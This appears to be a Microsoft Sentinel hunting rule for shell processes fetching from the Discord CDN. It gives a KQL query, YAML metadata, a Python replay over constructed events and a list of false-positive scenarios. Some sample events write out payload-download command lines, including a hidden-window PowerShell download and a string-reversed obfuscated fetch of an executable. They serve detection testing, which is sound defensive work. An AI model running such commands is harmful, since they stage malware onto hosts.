Command-line tooling (PowerShell, cmd.exe) reaching out to the Discord CDN (cdn.discordapp.com) is unusual on most hosts: the Discord client fetches attachments from the CDN itself, so a shell doing it is a sign that Discord attachments are being used for payload staging, C2 or exfiltration. SOC teams should hunt for this behavior in Azure Sentinel (now Microsoft Sentinel) to surface malware delivery or persistence that piggybacks on Discord infrastructure. The query below also matches the reversed hostname (moc.ppadrocsid.ndc), a cheap string-reversal obfuscation that hides the indicator from naive substring checks.
KQL Query
imProcess
| where Process has_any ("powershell.exe", "powershell_ise.exe", "cmd.exe") or CommandLine has "powershell"
| where CommandLine has_any ("cdn.discordapp.com", "moc.ppadrocsid.ndc")
| project-reorder TimeGenerated, Dvc, User, Process, CommandLine
| extend NTDomain = tostring(split(User,'\\',0)[0]), Name = tostring(split(User,'\\',1)[0])
| extend HostName = tostring(split(Dvc, '.', 0)[0]), DnsDomain = tostring(strcat_array(array_slice(split(Dvc, '.'), 1, -1), '.'))
| extend Account_0_Name = Name
| extend Account_0_NTDomain = NTDomain
| extend Host_0_HostName = HostName
| extend Host_0_DnsDomain = DnsDomain
id: 3169dc83-9e97-452c-afcc-baebdb0ddf7c
name: Discord download invoked from cmd line (ASIM Version)
description: |
'This hunting query looks for hosts that have attempted to interact with the Discord CDN. This activity is not normally invoked from the command line and could indicate C2, exfiltration, or malware delivery activity.'
requiredDataConnectors: []
tactics:
- Execution
- CommandAndControl
- Exfiltration
relevantTechniques:
- T1204
- T1102
- T1567
query: |
imProcess
| where Process has_any ("powershell.exe", "powershell_ise.exe", "cmd.exe") or CommandLine has "powershell"
| where CommandLine has_any ("cdn.discordapp.com", "moc.ppadrocsid.ndc")
| project-reorder TimeGenerated, Dvc, User, Process, CommandLine
| extend NTDomain = tostring(split(User,'\\',0)[0]), Name = tostring(split(User,'\\',1)[0])
| extend HostName = tostring(split(Dvc, '.', 0)[0]), DnsDomain = tostring(strcat_array(array_slice(split(Dvc, '.'), 1, -1), '.'))
| extend Account_0_Name = Name
| extend Account_0_NTDomain = NTDomain
| extend Host_0_HostName = HostName
| extend Host_0_DnsDomain = DnsDomain
entityMappings:
- entityType: Account
fieldMappings:
- identifier: Name
columnName: Name
- identifier: NTDomain
columnName: NTDomain
- entityType: Host
fieldMappings:
- identifier: HostName
columnName: HostName
- identifier: DnsDomain
columnName: DnsDomain
version: 1.0.1
metadata:
source:
kind: Community
author:
name: Pete Bryan
support:
tier: Community
categories:
domains: [ "Security - Threat Protection" ]
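The filters and the entity split the query performs, replayed in Python over a few constructed imProcess-style records so the logic can be checked offline. This is an added example, not code from the original page or from Microsoft Sentinel; the `_has` helper only approximates KQL's term-based, case-insensitive `has`, and every sample event is constructed for illustration.

```python
"""Offline rendition of the 'Discord download invoked from cmd line' hunt.

Added example (not part of the page or of Sentinel). It replays the KQL
filters over constructed imProcess-style records and reproduces the
NTDomain/Name and HostName/DnsDomain split the query performs.
"""
import re

# Mirrors: Process has_any ("powershell.exe", "powershell_ise.exe", "cmd.exe")
PROCESSES = ("powershell.exe", "powershell_ise.exe", "cmd.exe")
# Official CDN host plus its reversed form (string-reversal obfuscation)
INDICATORS = ("cdn.discordapp.com", "moc.ppadrocsid.ndc")


def _has(text: str, term: str) -> bool:
    """Approximation of KQL `has`: case-insensitive, and the term must sit at
    term boundaries (not inside a longer alphanumeric run)."""
    pattern = r"(?<![A-Za-z0-9_])" + re.escape(term) + r"(?![A-Za-z0-9_])"
    return re.search(pattern, text, re.IGNORECASE) is not None


def is_suspicious(event: dict) -> bool:
    """Both `where` clauses of the query: a shell process (or 'powershell'
    anywhere in the command line) AND a CDN indicator in the command line."""
    proc = event.get("Process", "").lower()
    cmd = event.get("CommandLine", "")
    shell = any(p in proc for p in PROCESSES) or _has(cmd, "powershell")
    return shell and any(_has(cmd, ind) for ind in INDICATORS)


def split_entities(event: dict) -> dict:
    """Same behaviour as the query's split()/array_slice() extends:
    a User without a backslash yields an empty Name, and a Dvc without
    dots yields an empty DnsDomain."""
    user_parts = event.get("User", "").split("\\")
    dvc_parts = event.get("Dvc", "").split(".")
    return {
        "NTDomain": user_parts[0],
        "Name": user_parts[1] if len(user_parts) > 1 else "",
        "HostName": dvc_parts[0],
        "DnsDomain": ".".join(dvc_parts[1:]),
    }


def hunt(events):
    """Return matching events enriched with the entity columns."""
    return [{**e, **split_entities(e)} for e in events if is_suspicious(e)]


# Constructed sample records (not real telemetry).
SAMPLE_EVENTS = [
    {   # hit: PowerShell pulling an attachment from the CDN
        "Dvc": "ws01.corp.example.com", "User": "CORP\\jdoe",
        "Process": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
        "CommandLine": "powershell.exe -nop -w hidden -c \"iwr "
                       "https://cdn.discordapp.com/attachments/111/222/update.exe "
                       "-OutFile $env:TEMP\\u.exe\"",
    },
    {   # hit: curl wrapped in cmd.exe
        "Dvc": "ws02.corp.example.com", "User": "CORP\\svc_build",
        "Process": "C:\\Windows\\System32\\cmd.exe",
        "CommandLine": "cmd.exe /c curl -s -o stage.bin "
                       "https://cdn.discordapp.com/attachments/333/444/stage.bin",
    },
    {   # no hit: the Discord client itself, no shell, no indicator
        "Dvc": "ws03.corp.example.com", "User": "CORP\\asmith",
        "Process": "C:\\Users\\asmith\\AppData\\Local\\Discord\\app-1.0.9\\Discord.exe",
        "CommandLine": "Discord.exe --processStart Discord.exe",
    },
    {   # hit via the reversed indicator; Dvc has no domain suffix
        "Dvc": "ws04", "User": "ws04\\admin",
        "Process": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
        "CommandLine": "powershell -nop -c \"$s='exe.dab/555/444/stnemhcatta/"
                       "moc.ppadrocsid.ndc//:sptth'; $u=-join $s[-1..-($s.Length)]; "
                       "iwr $u -OutFile bad.exe\"",
    },
    {   # no hit: curl.exe launched directly is outside the process filter
        "Dvc": "ws05.corp.example.com", "User": "CORP\\svc_updates",
        "Process": "C:\\Windows\\System32\\curl.exe",
        "CommandLine": "curl.exe -o DiscordSetup.exe "
                       "https://cdn.discordapp.com/setup/DiscordSetup.exe",
    },
]

if __name__ == "__main__":
    for hit in hunt(SAMPLE_EVENTS):
        print(hit["HostName"], hit["DnsDomain"], hit["NTDomain"], hit["Name"],
              hit["CommandLine"][:60])
```

The last sample record is the blind spot worth remembering when tuning: a scheduled task or installer that runs curl.exe, wget or certutil directly, with no cmd.exe or PowerShell wrapper, never reaches the second `where` because the process filter drops it first.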
Scenario: System Administrator Installs Discord via Command Line
Description: A system admin uses the command line to download and install Discord on a Windows machine using a script or package manager.
Filter/Exclusion: Check for the presence of discord.exe in known installation directories (e.g., C:\Program Files\Discord) or verify the process is initiated by a known admin account with a legitimate script.
Scenario: Scheduled Job for Discord Update via CLI
Description: A scheduled task is configured to run a script that downloads Discord updates from the official CDN using curl or wget. Note that a task which launches curl.exe or wget directly, with no cmd.exe or PowerShell wrapper, is not matched by this query's process filter at all.
Filter/Exclusion: Filter on the destination being the official CDN host (cdn.discordapp.com) rather than on a source IP, confirm the task definition is a known one, and verify the script is signed or originates from a trusted internal repository.
Scenario: Developer Uses Discord CLI Tool for Bot Management
Description: A developer uses a Discord API library such as discord.py or discord.js (community libraries rather than an official Discord CLI) to manage a bot, which may involve fetching attachments from the CDN or interacting with the Discord API; this only matches the query when the tooling is launched through cmd.exe or PowerShell.
Filter/Exclusion: Check for the interpreter and script (for example python.exe or node.exe with a bot script) in the process name or command line arguments, and verify the process is running under a developer account on a host where bot development is expected.
Scenario: IT Team Uses PowerShell to Deploy Discord on Multiple Hosts
Description: An IT team uses a PowerShell script to deploy Discord on multiple endpoints, which may involve downloading the installer via the command line.
Filter/Exclusion: Filter by the presence of a known IT deployment script or verify the process is initiated by a service account with elevated privileges and a documented deployment process.
Scenario: Security Tool or SIEM Agent Uses Discord for Alert Notification
Description: A security tool or SIEM agent is configured to send alerts to a Discord channel using a webhook, which may involve a command line invocation to send messages. Webhook posts target discord.com/api/webhooks rather than the CDN host, so they would only surface here if the CDN hostname also appears in the command line.
Filter/Exclusion: